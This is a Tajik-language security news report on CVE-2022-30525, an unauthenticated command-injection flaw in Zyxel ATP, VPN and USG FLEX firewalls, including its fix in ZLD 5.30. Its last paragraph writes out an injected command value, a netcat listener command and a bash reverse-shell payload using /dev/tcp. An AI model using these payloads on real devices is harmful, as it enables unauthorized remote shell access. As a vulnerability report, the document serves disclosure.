Дар дастгоҳҳои Zyxel аз силсилаи ATP, VPN ва USG FLEX осебпазирии интиқодӣ (CVE-2022-30525) муайян карда шудааст, ки барои ташкили амалиёти брандмауэрҳо, IDS ва VPN дар корхонаҳо тарҳрезӣ шудааст, ки ба ҳамлагари беруна имкон медиҳад, ки кодро дар компютер иҷро кунад. дастгоҳ бе ҳуқуқи корбар бе аутентификатсия. Барои анҷом додани ҳамла, ҳамлакунанда бояд қодир бошад, ки тавассути протоколи HTTP/HTTPS ба дастгоҳ дархост фиристад. Zyxel осебпазириро дар навсозии нармафзори ZLD 5.30 ислоҳ кардааст. Тибқи иттилои хадамоти Shodan, дар айни замон дар шабакаи ҷаҳонӣ 16213 дастгоҳи эҳтимолан осебпазир мавҷуд аст, ки дархостҳоро тавассути HTTP/HTTPS қабул мекунанд.
Амалиёт тавассути фиристодани фармонҳои махсус тарҳрезишуда ба веб коркардкунанда /ztp/cgi-bin/handler анҷом дода мешавад, ки бе аутентификатсия дастрас аст. Мушкилот аз набудани тозакунии дурусти параметрҳои дархост ҳангоми иҷрои фармонҳо дар система бо истифода аз занги os.system, ки дар китобхонаи lib_wan_settings.py истифода мешавад ва ҳангоми коркарди амалиёти setWanPortSt иҷро мешавад.
Масалан, ҳамлагар метавонад сатри гузарад "; ping 192.168.1.210;" ки ба ичрои фармони «ping 192.168.1.210» дар система оварда мерасонад. Барои дастрасӣ ба қабати фармон, шумо метавонед “nc -lvnp 1270”-ро дар системаи худ иҷро кунед ва сипас тавассути ирсоли дархост ба дастгоҳ бо '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.
Манбаъ: opennet.ru